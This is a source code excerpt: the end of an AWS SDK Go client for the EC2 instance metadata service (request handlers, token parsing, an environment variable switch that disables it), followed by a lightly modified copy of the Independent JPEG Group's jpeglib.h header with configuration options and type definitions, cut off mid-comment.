// Disable the EC2 Metadata service if the environment variable is set.
// This short-circuits the service's functionality to always fail to send
// requests.
if strings.ToLower(os.Getenv(disableServiceEnvVar)) == "true" {
svc.Handlers.Send.SwapNamed(request.NamedHandler{
Name: corehandlers.SendHandler.Name,
Fn: func(r *request.Request) {
r.HTTPResponse = &http.Response{
Header: http.Header{},
}
r.Error = awserr.New(
request.CanceledErrorCode,
"EC2 IMDS access disabled via "+disableServiceEnvVar+" env var",
nil)
},
})
}
// Add additional options to the service config
for _, option := range opts {
option(svc.Client)
}
return svc
}
func httpClientZero(c *http.Client) bool {
return c == nil || (c.Transport == nil && c.CheckRedirect == nil && c.Jar == nil && c.Timeout == 0)
}
type metadataOutput struct {
Content string
}
type tokenOutput struct {
Token string
TTL time.Duration
}
// unmarshal token handler is used to parse the response of a getToken operation
var unmarshalTokenHandler = request.NamedHandler{
Name: unmarshalTokenHandlerName,
Fn: func(r *request.Request) {
defer r.HTTPResponse.Body.Close()
var b bytes.Buffer
if _, err := io.Copy(&b, r.HTTPResponse.Body); err != nil {
r.Error = awserr.NewRequestFailure(awserr.New(request.ErrCodeSerialization,
"unable to unmarshal EC2 metadata response", err), r.HTTPResponse.StatusCode, r.RequestID)
return
}
v := r.HTTPResponse.Header.Get(ttlHeader)
data, ok := r.Data.(*tokenOutput)
if !ok {
return
}
data.Token = b.String()
// TTL is in seconds
i, err := strconv.ParseInt(v, 10, 64)
if err != nil {
r.Error = awserr.NewRequestFailure(awserr.New(request.ParamFormatErrCode,
"unable to parse EC2 token TTL response", err), r.HTTPResponse.StatusCode, r.RequestID)
return
}
t := time.Duration(i) * time.Second
data.TTL = t
},
}
var unmarshalHandler = request.NamedHandler{
Name: unmarshalMetadataHandlerName,
Fn: func(r *request.Request) {
defer r.HTTPResponse.Body.Close()
var b bytes.Buffer
if _, err := io.Copy(&b, r.HTTPResponse.Body); err != nil {
r.Error = awserr.NewRequestFailure(awserr.New(request.ErrCodeSerialization,
"unable to unmarshal EC2 metadata response", err), r.HTTPResponse.StatusCode, r.RequestID)
return
}
if data, ok := r.Data.(*metadataOutput); ok {
data.Content = b.String()
}
},
}
func unmarshalError(r *request.Request) {
defer r.HTTPResponse.Body.Close()
var b bytes.Buffer
if _, err := io.Copy(&b, r.HTTPResponse.Body); err != nil {
r.Error = awserr.NewRequestFailure(
awserr.New(request.ErrCodeSerialization, "unable to unmarshal EC2 metadata error response", err),
r.HTTPResponse.StatusCode, r.RequestID)
return
}
// Response body format is not consistent between metadata endpoints.
// Grab the error message as a string and include that as the source error
r.Error = awserr.NewRequestFailure(awserr.New("EC2MetadataError", "failed to make EC2Metadata request", errors.New(b.String())),
r.HTTPResponse.StatusCode, r.RequestID)
}
func validateEndpointHandler(r *request.Request) {
if r.ClientInfo.Endpoint == "" {
r.Error = aws.ErrMissingEndpoint
}
}
| {
"pile_set_name": "Github"
} |
/*
* jpeglib.h
*
* Copyright (C) 1991-1998, Thomas G. Lane.
* This file is part of the Independent JPEG Group's software.
* For conditions of distribution and use, see the accompanying README file.
* Visit the website at: http://www.ijg.org/
*
* This file defines the application interface for the JPEG library.
* Most applications using the library need only include this file,
* and perhaps jerror.h if they want to know the exact error codes.
*/
#ifndef JPEGLIB_H
#define JPEGLIB_H
/*
* First we include the configuration files that record how this
* installation of the JPEG library is set up. jconfig.h can be
* generated automatically for many systems. jmorecfg.h contains
* manual configuration options that most people need not worry about.
*/
#ifndef JCONFIG_INCLUDED /* in case jinclude.h already did */
#include <stdio.h>
#include <stdlib.h>
#include <iostream>
#include <string.h>
#include <stdarg.h>
#include <math.h>
#include <malloc.h>
#include <string.h>
#include <tchar.h>
#include <windows.h>
/*
* jconfig.doc
*
* Copyright (C) 1991-1994, Thomas G. Lane.
* This file is part of the Independent JPEG Group's software.
* For conditions of distribution and use, see the accompanying README file.
*
* This file documents the configuration options that are required to
* customize the JPEG software for a particular system.
*
* The actual configuration options for a particular installation are stored
* in jconfig.h. On many machines, jconfig.h can be generated automatically
* or copied from one of the "canned" jconfig files that we supply. But if
* you need to generate a jconfig.h file by hand, this file tells you how.
*
* DO NOT EDIT THIS FILE --- IT WON'T ACCOMPLISH ANYTHING.
* EDIT A COPY NAMED JCONFIG.H.
*/
/*
* These symbols indicate the properties of your machine or compiler.
* #define the symbol if yes, #undef it if no.
*/
/* Does your compiler support function prototypes?
* (If not, you also need to use ansi2knr, see install.doc)
*/
#define HAVE_PROTOTYPES
/* Does your compiler support the declaration "unsigned char" ?
* How about "unsigned short" ?
*/
#define HAVE_UNSIGNED_CHAR
#define HAVE_UNSIGNED_SHORT
/* Define "void" as "char" if your compiler doesn't know about type void.
* NOTE: be sure to define void such that "void *" represents the most general
* pointer type, e.g., that returned by malloc().
*/
/* #define void char */
/* Define "const" as empty if your compiler doesn't know the "const" keyword.
*/
/* #define const */
/* Define this if an ordinary "char" type is unsigned.
* If you're not sure, leaving it undefined will work at some cost in speed.
* If you defined HAVE_UNSIGNED_CHAR then the speed difference is minimal.
*/
#undef CHAR_IS_UNSIGNED
/* Define this if your system has an ANSI-conforming <stddef.h> file.
*/
#define HAVE_STDDEF_H
/* Define this if your system has an ANSI-conforming <stdlib.h> file.
*/
#define HAVE_STDLIB_H
/* Define this if your system does not have an ANSI/SysV <string.h>,
* but does have a BSD-style <strings.h>.
*/
#undef NEED_BSD_STRINGS
/* Define this if your system does not provide typedef size_t in any of the
* ANSI-standard places (stddef.h, stdlib.h, or stdio.h), but places it in
* <sys/types.h> instead.
*/
#undef NEED_SYS_TYPES_H
/* For 80x86 machines, you need to define NEED_FAR_POINTERS,
* unless you are using a large-data memory model or 80386 flat-memory mode.
* On less brain-damaged CPUs this symbol must not be defined.
* (Defining this symbol causes large data structures to be referenced through
* "far" pointers and to be allocated with a special version of malloc.)
*/
#undef NEED_FAR_POINTERS
/* Define this if your linker needs global names to be unique in less
* than the first 15 characters.
*/
#undef NEED_SHORT_EXTERNAL_NAMES
/* Although a real ANSI C compiler can deal perfectly well with pointers to
* unspecified structures (see "incomplete types" in the spec), a few pre-ANSI
* and pseudo-ANSI compilers get confused. To keep one of these bozos happy,
* define INCOMPLETE_TYPES_BROKEN. This is not recommended unless you
* actually get "missing structure definition" warnings or errors while
* compiling the JPEG code.
*/
#undef INCOMPLETE_TYPES_BROKEN
/*
* The following options affect code selection within the JPEG library,
* but they don't need to be visible to applications using the library.
* To minimize application namespace pollution, the symbols won't be
* defined unless JPEG_INTERNALS has been defined.
*/
#ifdef JPEG_INTERNALS
/* Define this if your compiler implements ">>" on signed values as a logical
* (unsigned) shift; leave it undefined if ">>" is a signed (arithmetic) shift,
* which is the normal and rational definition.
*/
#undef RIGHT_SHIFT_IS_UNSIGNED
#endif /* JPEG_INTERNALS */
/*
* The remaining options do not affect the JPEG library proper,
* but only the sample applications cjpeg/djpeg (see cjpeg.c, djpeg.c).
* Other applications can ignore these.
*/
#ifdef JPEG_CJPEG_DJPEG
/* These defines indicate which image (non-JPEG) file formats are allowed. */
#define BMP_SUPPORTED /* BMP image file format */
#define GIF_SUPPORTED /* GIF image file format */
#define PPM_SUPPORTED /* PBMPLUS PPM/PGM image file format */
#undef RLE_SUPPORTED /* Utah RLE image file format */
#define TARGA_SUPPORTED /* Targa image file format */
/* Define this if you want to name both input and output files on the command
* line, rather than using stdout and optionally stdin. You MUST do this if
* your system can't cope with binary I/O to stdin/stdout. See comments at
* head of cjpeg.c or djpeg.c.
*/
#undef TWO_FILE_COMMANDLINE
/* Define this if your system needs explicit cleanup of temporary files.
* This is crucial under MS-DOS, where the temporary "files" may be areas
* of extended memory; on most other systems it's not as important.
*/
#undef NEED_SIGNAL_CATCHER
/* By default, we open image files with fopen(...,"rb") or fopen(...,"wb").
* This is necessary on systems that distinguish text files from binary files,
* and is harmless on most systems that don't. If you have one of the rare
* systems that complains about the "b" spec, define this symbol.
*/
#undef DONT_USE_B_MODE
/* Define this if you want percent-done progress reports from cjpeg/djpeg.
*/
#undef PROGRESS_REPORT
#define HAVE_BOOLEAN
#endif /* JPEG_CJPEG_DJPEG */
#endif /* ifndef JCONFIG_INCLUDED */
/*
* Define BITS_IN_JSAMPLE as either
* 8 for 8-bit sample values (the usual setting)
* 12 for 12-bit sample values
* Only 8 and 12 are legal data precisions for lossy JPEG according to the
* JPEG standard, and the IJG code does not support anything else!
* We do not support run-time selection of data precision, sorry.
*/
#define BITS_IN_JSAMPLE 8 /* use 8 or 12 */
/*
* Maximum number of components (color channels) allowed in JPEG image.
* To meet the letter of the JPEG spec, set this to 255. However, darn
* few applications need more than 4 channels (maybe 5 for CMYK + alpha
* mask). We recommend 10 as a reasonable compromise; use 4 if you are
* really short on memory. (Each allowed component costs a hundred or so
* bytes of storage, whether actually used in an image or not.)
*/
#define MAX_COMPONENTS 10 /* maximum number of image components */
/*
* Basic data types.
* You may need to change these if you have a machine with unusual data
* type sizes; for example, "char" not 8 bits, "short" not 16 bits,
* or "long" not 32 bits. We don't care whether "int" is 16 or 32 bits,
* but it had better be at least 16.
*/
/* Representation of a single sample (pixel element value).
* We frequently allocate large arrays of these, so it's important to keep
* them small. But if you have memory to burn and access to char or short
* arrays is very slow on your hardware, you might want to change these.
*/
#if BITS_IN_JSAMPLE == 8
/* JSAMPLE should be the smallest type that will hold the values 0..255.
* You can use a signed char by having GETJSAMPLE mask it with 0xFF.
*/
#ifdef HAVE_UNSIGNED_CHAR
typedef unsigned char JSAMPLE;
#define GETJSAMPLE(value) ((int) (value))
#else /* not HAVE_UNSIGNED_CHAR */
typedef char JSAMPLE;
#ifdef CHAR_IS_UNSIGNED
#define GETJSAMPLE(value) ((int) (value))
#else
#define GETJSAMPLE(value) ((int) (value) & 0xFF)
#endif /* CHAR_IS_UNSIGNED */
#endif /* HAVE_UNSIGNED_CHAR */
#define MAXJSAMPLE 255
#define CENTERJSAMPLE 128
#endif /* BITS_IN_JSAMPLE == 8 */
#if BITS_IN_JSAMPLE == 12
/* JSAMPLE should be the smallest type that will hold the values 0..4095.
* On nearly all machines "short" will do nicely.
*/
typedef short JSAMPLE;
#define GETJSAMPLE(value) ((int) (value))
#define MAXJSAMPLE 4095
#define CENTERJSAMPLE 2048
#endif /* BITS_IN_JSAMPLE == 12 */
/* Representation of a DCT frequency coefficient.
* This should be a signed value of at least 16 bits; "short" is usually OK.
* Again, we allocate large arrays of these, but you can change to int
* if you have memory to burn and "short" is really slow.
*/
typedef short JCOEF;
/* Compressed datastreams are represented as arrays of JOCTET.
* These must be EXACTLY 8 bits wide, at least once they are written to
* external storage. Note that when using the stdio data source/destination
* managers, this is also the data type passed to fread/fwrite.
*/
#ifdef HAVE_UNSIGNED_CHAR
typedef unsigned char JOCTET;
#define GETJOCTET(value) (value)
#else /* not HAVE_UNSIGNED_CHAR */
typedef char JOCTET;
#ifdef CHAR_IS_UNSIGNED
#define GETJOCTET(value) (value)
#else
#define GETJOCTET(value) ((value) & 0xFF)
#endif /* CHAR_IS_UNSIGNED */
#endif /* HAVE_UNSIGNED_CHAR */
/* These typedefs are used for various table entries and so forth.
* They must be at least as wide as specified; but making them too big
* won't cost a huge amount of memory, so we don't provide special
* extraction code like we did for JSAMPLE. (In other words, these
* typedefs live at a different point on the speed/space tradeoff curve.)
*/
/* UINT8 must hold at least the values 0..255. */
#ifdef HAVE_UNSIGNED_CHAR
typedef unsigned char UINT8;
#else /* not HAVE_UNSIGNED_CHAR */
#ifdef CHAR_IS_UNSIGNED
typedef char UINT8;
#else /* not CHAR_IS_UNSIGNED */
typedef short UINT8;
#endif /* CHAR_IS_UNSIGNED */
#endif /* HAVE_UNSIGNED_CHAR */
/* UINT16 must hold at least the values 0..65535. */
#ifdef HAVE_UNSIGNED_SHORT
typedef unsigned short UINT16;
#else /* not HAVE_UNSIGNED_SHORT */
typedef unsigned int UINT16;
#endif /* HAVE_UNSIGNED_SHORT */
/* INT16 must hold at least the values -32768..32767. */
#ifndef XMD_H /* X11/xmd.h correctly defines INT16 */
typedef short INT16;
#endif
/* INT32 must hold at least signed 32-bit values. */
#ifdef NEED_INT32 /* X11/xmd.h correctly defines INT32 */
typedef long INT32;
#endif
/* Datatype used for image dimensions. The JPEG standard only supports
* images up to 64K*64K due to 16-bit fields in SOF markers. Therefore
* "unsigned int" is sufficient on all machines. However, if you need to
* handle larger images and you don't mind deviating from the spec, you
* can change this datatype.
*/
typedef unsigned int JDIMENSION;
#define JPEG_MAX_DIMENSION 65500L /* a tad under 64K to prevent overflows */
/* These macros are used in all function definitions and extern declarations.
* You could modify them if you need to change function linkage conventions;
* in particular, you'll need to do that to make the library a Windows DLL.
* Another application is to make all functions global for use with debuggers
* or code profilers that require it.
*/
/* a function called through method pointers: */
#define METHODDEF(type) static type
/* a function used only in its module: */
#define LOCAL(type) static type
/* a function referenced thru EXTERNs: */
#define GLOBAL(type) type
/* a reference to a GLOBAL function: */
#define EXTERN(type) extern type
/* This macro is used to declare a "method", that is, a function pointer.
* We want to supply prototype parameters if the compiler can cope.
* Note that the arglist parameter must be parenthesized!
* Again, you can customize this if you need special linkage keywords.
*/
#ifdef HAVE_PROTOTYPES
#define JMETHOD(type,methodname,arglist) type (*methodname) arglist
#else
#define JMETHOD(type,methodname,arglist) type (*methodname) ()
#endif
/* Here is the pseudo-keyword for declaring pointers that must be "far"
* on 80x86 machines. Most of the specialized coding for 80x86 is handled
* by just saying "FAR *" where such a pointer is needed. In a few places
* explicit coding is needed; see uses of the NEED_FAR_POINTERS symbol.
*/
#ifdef NEED_FAR_POINTERS
#define FAR far
#else
//#define FAR
#endif
/*
* On a few systems, type boolean and/or its values FALSE, TRUE may appear
* in standard header files. Or you may have conflicts with application-
* specific header files that you want to include together with these files.
* Defining HAVE_BOOLEAN before including jpeglib.h should make it work.
*/
#ifndef HAVE_BOOLEAN
//typedef int boolean;
#endif
#ifndef FALSE /* in case these macros already exist */
#define FALSE 0 /* values of boolean */
#endif
#ifndef TRUE
#define TRUE 1
#endif
/*
* The remaining options affect code selection within the JPEG library,
* but they don't need to be visible to most applications using the library.
* To minimize application namespace pollution, the symbols won't be
* defined unless JPEG_INTERNALS or JPEG_INTERNAL_OPTIONS has been defined.
*/
#ifdef JPEG_INTERNALS
#define JPEG_INTERNAL_OPTIONS
#endif
#ifdef JPEG_INTERNAL_OPTIONS
/*
* These defines indicate whether to include various optional functions.
* Undefining some of these symbols will produce a smaller but less capable
* library. Note that you can leave certain source files out of the
* compilation/linking process if you've #undef'd the corresponding symbols.
* (You may HAVE to do that if your compiler doesn't like null source files.)
*/
/* Arithmetic coding is unsupported for legal reasons. Complaints to IBM. */
/* Capability options common to encoder and decoder: */
#define DCT_ISLOW_SUPPORTED /* slow but accurate integer algorithm */
#define DCT_IFAST_SUPPORTED /* faster, less accurate integer method */
#define DCT_FLOAT_SUPPORTED /* floating-point: accurate, fast on fast HW */
/* Encoder capability options: */
#undef C_ARITH_CODING_SUPPORTED /* Arithmetic coding back end? */
#define C_MULTISCAN_FILES_SUPPORTED /* Multiple-scan JPEG files? */
#define C_PROGRESSIVE_SUPPORTED /* Progressive JPEG? (Requires MULTISCAN)*/
#define ENTROPY_OPT_SUPPORTED /* Optimization of entropy coding parms? */
/* Note: if you selected 12-bit data precision, it is dangerous to turn off
* ENTROPY_OPT_SUPPORTED. The standard Huffman tables are only good for 8-bit
* precision, so jchuff.c normally uses entropy optimization to compute
* usable tables for higher precision. If you don't want to do optimization,
* you'll have to supply different default Huffman tables.
* The exact same statements apply for progressive JPEG: the default tables
* don't work for progressive mode. (This may get fixed, however.)
*/
#define INPUT_SMOOTHING_SUPPORTED /* Input image smoothing option? */
/* Decoder capability options: */
#undef D_ARITH_CODING_SUPPORTED /* Arithmetic coding back end? */
#define D_MULTISCAN_FILES_SUPPORTED /* Multiple-scan JPEG files? */
#define D_PROGRESSIVE_SUPPORTED /* Progressive JPEG? (Requires MULTISCAN)*/
#define SAVE_MARKERS_SUPPORTED /* jpeg_save_markers() needed? */
#define BLOCK_SMOOTHING_SUPPORTED /* Block smoothing? (Progressive only) */
#define IDCT_SCALING_SUPPORTED /* Output rescaling via IDCT? */
#undef UPSAMPLE_SCALING_SUPPORTED /* Output rescaling at upsample stage? */
#define UPSAMPLE_MERGING_SUPPORTED /* Fast path for sloppy upsampling? */
#define QUANT_1PASS_SUPPORTED /* 1-pass color quantization? */
#define QUANT_2PASS_SUPPORTED /* 2-pass color quantization? */
/* more capability options later, no doubt */
/*
* Ordering of RGB data in scanlines passed to or from the application.
* If your application wants to deal with data in the order B,G,R, just
* change these macros. You can also deal with formats such as R,G,B,X
* (one extra byte per pixel) by changing RGB_PIXELSIZE. Note that changing
* the offsets will also change the order in which colormap data is organized.
* RESTRICTIONS:
* 1. The sample applications cjpeg,djpeg do NOT support modified RGB formats.
* 2. These macros only affect RGB<=>YCbCr color conversion, so they are not
* useful if you are using JPEG color spaces other than YCbCr or grayscale.
* 3. The color quantizer modules will not behave desirably if RGB_PIXELSIZE
* is not 3 (they don't understand about dummy color components!). So you
* can't use color quantization if you change that value.
*/
#define RGB_RED 0 /* Offset of Red in an RGB scanline element */
#define RGB_GREEN 1 /* Offset of Green */
#define RGB_BLUE 2 /* Offset of Blue */
#define RGB_PIXELSIZE 3 /* JSAMPLEs per RGB scanline element */
/* Definitions for speed-related optimizations. */
/* If your compiler supports inline functions, define INLINE
* as the inline keyword; otherwise define it as empty.
*/
#ifndef INLINE
#ifdef __GNUC__ /* for instance, GNU C knows about inline */
#define INLINE __inline__
#endif
#ifndef INLINE
#define INLINE /* default is to define it as empty */
#endif
#endif
/* On some machines (notably 68000 series) "int" is 32 bits, but multiplying
* two 16-bit shorts is faster than multiplying two ints. Define MULTIPLIER
* as short on such a machine. MULTIPLIER must be at least 16 bits wide.
*/
#ifndef MULTIPLIER
#define MULTIPLIER int /* type for fastest integer multiply */
#endif
/* FAST_FLOAT should be either float or double, whichever is done faster
* by your compiler. (Note that this type is only used in the floating point
* DCT routines, so it only matters if you've defined DCT_FLOAT_SUPPORTED.)
* Typically, float is faster in ANSI C compilers, while double is faster in
* pre-ANSI compilers (because they insist on converting to double anyway).
* The code below therefore chooses float if we have ANSI-style prototypes.
*/
#ifndef FAST_FLOAT
#ifdef HAVE_PROTOTYPES
#define FAST_FLOAT float
#else
#define FAST_FLOAT double
#endif
#endif
#endif /* JPEG_INTERNAL_OPTIONS */
#if defined(__cplusplus)
extern "C" {
#endif
/* Version ID for the JPEG library.
* Might be useful for tests like "#if JPEG_LIB_VERSION >= 60".
*/
#define JPEG_LIB_VERSION 62 /* Version 6b */
/* Various constants determining the sizes of things.
* All of these are specified by the JPEG standard, so don't change them
* if you want to be compatible.
*/
#define DCTSIZE 8 /* The basic DCT block is 8x8 samples */
#define DCTSIZE2 64 /* DCTSIZE squared; # of elements in a block */
#define NUM_QUANT_TBLS 4 /* Quantization tables are numbered 0..3 */
#define NUM_HUFF_TBLS 4 /* Huffman tables are numbered 0..3 */
#define NUM_ARITH_TBLS 16 /* Arith-coding tables are numbered 0..15 */
#define MAX_COMPS_IN_SCAN 4 /* JPEG limit on # of components in one scan */
#define MAX_SAMP_FACTOR 4 /* JPEG limit on sampling factors */
/* Unfortunately, some bozo at Adobe saw no reason to be bound by the standard;
* the PostScript DCT filter can emit files with many more than 10 blocks/MCU.
* If you happen to run across such a file, you can up D_MAX_BLOCKS_IN_MCU
* to handle it. We even let you do this from the jconfig.h file. However,
* we strongly discourage changing C_MAX_BLOCKS_IN_MCU; just because Adobe
* sometimes emits noncompliant files doesn't mean you should too.
*/
#define C_MAX_BLOCKS_IN_MCU 10 /* compressor's limit on blocks per MCU */
#ifndef D_MAX_BLOCKS_IN_MCU
#define D_MAX_BLOCKS_IN_MCU 10 /* decompressor's limit on blocks per MCU */
#endif
/* Data structures for images (arrays of samples and of DCT coefficients).
* On 80x86 machines, the image arrays are too big for near pointers,
* but the pointer arrays can fit in near memory.
*/
typedef JSAMPLE FAR *JSAMPROW; /* ptr to one image row of pixel samples. */
typedef JSAMPROW *JSAMPARRAY; /* ptr to some rows (a 2-D sample array) */
typedef JSAMPARRAY *JSAMPIMAGE; /* a 3-D sample array: top index is color */
typedef JCOEF JBLOCK[DCTSIZE2]; /* one block of coefficients */
typedef JBLOCK FAR *JBLOCKROW; /* pointer to one row of coefficient blocks */
typedef JBLOCKROW *JBLOCKARRAY; /* a 2-D array of coefficient blocks */
typedef JBLOCKARRAY *JBLOCKIMAGE; /* a 3-D array of coefficient blocks */
typedef JCOEF FAR *JCOEFPTR; /* useful in a couple of places */
/* Types for JPEG compression parameters and working tables. */
/* DCT coefficient quantization tables. */
typedef struct {
/* This array gives the coefficient quantizers in natural array order
* (not the zigzag order in which they are stored in a JPEG DQT marker).
* CAUTION: IJG versions prior to v6a kept this array in zigzag order.
*/
UINT16 quantval[DCTSIZE2]; /* quantization step for each coefficient */
/* This field is used only during compression. It's initialized FALSE when
* the table is created, and set TRUE when it's been output to the file.
* You could suppress output of a table by setting this to TRUE.
* (See jpeg_suppress_tables for an example.)
*/
boolean sent_table; /* TRUE when table has been output */
} JQUANT_TBL;
/* Huffman coding tables. */
typedef struct {
/* These two fields directly represent the contents of a JPEG DHT marker */
UINT8 bits[17]; /* bits[k] = # of symbols with codes of */
/* length k bits; bits[0] is unused */
UINT8 huffval[256]; /* The symbols, in order of incr code length */
/* This field is used only during compression. It's initialized FALSE when
* the table is created, and set TRUE when it's been output to the file.
* You could suppress output of a table by setting this to TRUE.
* (See jpeg_suppress_tables for an example.)
*/
boolean sent_table; /* TRUE when table has been output */
} JHUFF_TBL;
/* Basic info about one component (color channel). */
typedef struct {
/* These values are fixed over the whole image. */
/* For compression, they must be supplied by parameter setup; */
/* for decompression, they are read from the SOF marker. */
int component_id; /* identifier for this component (0..255) */
int component_index; /* its index in SOF or cinfo->comp_info[] */
int h_samp_factor; /* horizontal sampling factor (1..4) */
int v_samp_factor; /* vertical sampling factor (1..4) */
int quant_tbl_no; /* quantization table selector (0..3) */
/* These values may vary between scans. */
/* For compression, they must be supplied by parameter setup; */
/* for decompression, they are read from the SOS marker. */
/* The decompressor output side may not use these variables. */
int dc_tbl_no; /* DC entropy table selector (0..3) */
int ac_tbl_no; /* AC entropy table selector (0..3) */
/* Remaining fields should be treated as private by applications. */
/* These values are computed during compression or decompression startup: */
/* Component's size in DCT blocks.
* Any dummy blocks added to complete an MCU are not counted; therefore
* these values do not depend on whether a scan is interleaved or not.
*/
JDIMENSION width_in_blocks;
JDIMENSION height_in_blocks;
/* Size of a DCT block in samples. Always DCTSIZE for compression.
* For decompression this is the size of the output from one DCT block,
* reflecting any scaling we choose to apply during the IDCT step.
* Values of 1,2,4,8 are likely to be supported. Note that different
* components may receive different IDCT scalings.
*/
int DCT_scaled_size;
/* The downsampled dimensions are the component's actual, unpadded number
* of samples at the main buffer (preprocessing/compression interface), thus
* downsampled_width = ceil(image_width * Hi/Hmax)
* and similarly for height. For decompression, IDCT scaling is included, so
* downsampled_width = ceil(image_width * Hi/Hmax * DCT_scaled_size/DCTSIZE)
*/
JDIMENSION downsampled_width; /* actual width in samples */
JDIMENSION downsampled_height; /* actual height in samples */
/* This flag is used only for decompression. In cases where some of the
* components will be ignored (eg grayscale output from YCbCr image),
* we can skip most computations for the unused components.
*/
boolean component_needed; /* do we need the value of this component? */
/* These values are computed before starting a scan of the component. */
/* The decompressor output side may not use these variables. */
int MCU_width; /* number of blocks per MCU, horizontally */
int MCU_height; /* number of blocks per MCU, vertically */
int MCU_blocks; /* MCU_width * MCU_height */
int MCU_sample_width; /* MCU width in samples, MCU_width*DCT_scaled_size */
int last_col_width; /* # of non-dummy blocks across in last MCU */
int last_row_height; /* # of non-dummy blocks down in last MCU */
/* Saved quantization table for component; NULL if none yet saved.
* See jdinput.c comments about the need for this information.
* This field is currently used only for decompression.
*/
JQUANT_TBL * quant_table;
/* Private per-component storage for DCT or IDCT subsystem. */
void * dct_table;
} jpeg_component_info;
/* The script for encoding a multiple-scan file is an array of these: */
typedef struct {
int comps_in_scan; /* number of components encoded in this scan */
int component_index[MAX_COMPS_IN_SCAN]; /* their SOF/comp_info[] indexes */
int Ss, Se; /* progressive JPEG spectral selection parms */
int Ah, Al; /* progressive JPEG successive approx. parms */
} jpeg_scan_info;
/* The decompressor can save APPn and COM markers in a list of these: */
typedef struct jpeg_marker_struct FAR * jpeg_saved_marker_ptr;
struct jpeg_marker_struct {
jpeg_saved_marker_ptr next; /* next in list, or NULL */
UINT8 marker; /* marker code: JPEG_COM, or JPEG_APP0+n */
unsigned int original_length; /* # bytes of data in the file */
unsigned int data_length; /* # bytes of data saved at data[] */
JOCTET FAR * data; /* the data contained in the marker */
/* the marker length word is not counted in data_length or original_length */
};
/* Known color spaces. */
typedef enum {
JCS_UNKNOWN, /* error/unspecified */
JCS_GRAYSCALE, /* monochrome */
JCS_RGB, /* red/green/blue */
JCS_YCbCr, /* Y/Cb/Cr (also known as YUV) */
JCS_CMYK, /* C/M/Y/K */
JCS_YCCK /* Y/Cb/Cr/K */
} J_COLOR_SPACE;
/* DCT/IDCT algorithm options. */
typedef enum {
JDCT_ISLOW, /* slow but accurate integer algorithm */
JDCT_IFAST, /* faster, less accurate integer method */
JDCT_FLOAT /* floating-point: accurate, fast on fast HW */
} J_DCT_METHOD;
#ifndef JDCT_DEFAULT /* may be overridden in jconfig.h */
#define JDCT_DEFAULT JDCT_ISLOW
#endif
#ifndef JDCT_FASTEST /* may be overridden in jconfig.h */
#define JDCT_FASTEST JDCT_IFAST
#endif
/* Dithering options for decompression. */
typedef enum {
JDITHER_NONE, /* no dithering */
JDITHER_ORDERED, /* simple ordered dither */
JDITHER_FS /* Floyd-Steinberg error diffusion dither */
} J_DITHER_MODE;
/* Common fields between JPEG compression and decompression master structs. */
#define jpeg_common_fields \
struct jpeg_error_mgr * err; /* Error handler module */\
struct jpeg_memory_mgr * mem; /* Memory manager module */\
struct jpeg_progress_mgr * progress; /* Progress monitor, or NULL if none */\
void * client_data; /* Available for use by application */\
boolean is_decompressor; /* So common code can tell which is which */\
int global_state /* For checking call sequence validity */
/* Routines that are to be used by both halves of the library are declared
* to receive a pointer to this structure. There are no actual instances of
* jpeg_common_struct, only of jpeg_compress_struct and jpeg_decompress_struct.
*/
struct jpeg_common_struct {
jpeg_common_fields; /* Fields common to both master struct types */
/* Additional fields follow in an actual jpeg_compress_struct or
* jpeg_decompress_struct. All three structs must agree on these
* initial fields! (This would be a lot cleaner in C++.)
*/
};
typedef struct jpeg_common_struct * j_common_ptr;
typedef struct jpeg_compress_struct * j_compress_ptr;
typedef struct jpeg_decompress_struct * j_decompress_ptr;
/* Master record for a compression instance */
struct jpeg_compress_struct
{
jpeg_common_fields; /* Fields shared with jpeg_decompress_struct */
/* Destination for compressed data */
struct jpeg_destination_mgr * dest;
/* Description of source image --- these fields must be filled in by
* outer application before starting compression. in_color_space must
* be correct before you can even call jpeg_set_defaults().
*/
JDIMENSION image_width; /* input image width */
JDIMENSION image_height; /* input image height */
int input_components; /* # of color components in input image */
J_COLOR_SPACE in_color_space; /* colorspace of input image */
double input_gamma; /* image gamma of input image */
/* Compression parameters --- these fields must be set before calling
* jpeg_start_compress(). We recommend calling jpeg_set_defaults() to
* initialize everything to reasonable defaults, then changing anything
* the application specifically wants to change. That way you won't get
* burnt when new parameters are added. Also note that there are several
* helper routines to simplify changing parameters.
*/
int data_precision; /* bits of precision in image data */
int num_components; /* # of color components in JPEG image */
J_COLOR_SPACE jpeg_color_space; /* colorspace of JPEG image */
jpeg_component_info * comp_info;
/* comp_info[i] describes component that appears i'th in SOF */
JQUANT_TBL * quant_tbl_ptrs[NUM_QUANT_TBLS];
/* ptrs to coefficient quantization tables, or NULL if not defined */
JHUFF_TBL * dc_huff_tbl_ptrs[NUM_HUFF_TBLS];
JHUFF_TBL * ac_huff_tbl_ptrs[NUM_HUFF_TBLS];
/* ptrs to Huffman coding tables, or NULL if not defined */
UINT8 arith_dc_L[NUM_ARITH_TBLS]; /* L values for DC arith-coding tables */
UINT8 arith_dc_U[NUM_ARITH_TBLS]; /* U values for DC arith-coding tables */
UINT8 arith_ac_K[NUM_ARITH_TBLS]; /* Kx values for AC arith-coding tables */
int num_scans; /* # of entries in scan_info array */
const jpeg_scan_info * scan_info; /* script for multi-scan file, or NULL */
/* The default value of scan_info is NULL, which causes a single-scan
* sequential JPEG file to be emitted. To create a multi-scan file,
* set num_scans and scan_info to point to an array of scan definitions.
*/
boolean raw_data_in; /* TRUE=caller supplies downsampled data */
boolean arith_code; /* TRUE=arithmetic coding, FALSE=Huffman */
boolean optimize_coding; /* TRUE=optimize entropy encoding parms */
boolean CCIR601_sampling; /* TRUE=first samples are cosited */
int smoothing_factor; /* 1..100, or 0 for no input smoothing */
J_DCT_METHOD dct_method; /* DCT algorithm selector */
/* The restart interval can be specified in absolute MCUs by setting
* restart_interval, or in MCU rows by setting restart_in_rows
* (in which case the correct restart_interval will be figured
* for each scan).
*/
unsigned int restart_interval; /* MCUs per restart, or 0 for no restart */
int restart_in_rows; /* if > 0, MCU rows per restart interval */
/* Parameters controlling emission of special markers. */
boolean write_JFIF_header; /* should a JFIF marker be written? */
UINT8 JFIF_major_version; /* What to write for the JFIF version number */
UINT8 JFIF_minor_version;
/* These three values are not used by the JPEG code, merely copied */
/* into the JFIF APP0 marker. density_unit can be 0 for unknown, */
/* 1 for dots/inch, or 2 for dots/cm. Note that the pixel aspect */
/* ratio is defined by X_density/Y_density even when density_unit=0. */
UINT8 density_unit; /* JFIF code for pixel size units */
UINT16 X_density; /* Horizontal pixel density */
UINT16 Y_density; /* Vertical pixel density */
boolean write_Adobe_marker; /* should an Adobe marker be written? */
/* State variable: index of next scanline to be written to
* jpeg_write_scanlines(). Application may use this to control its
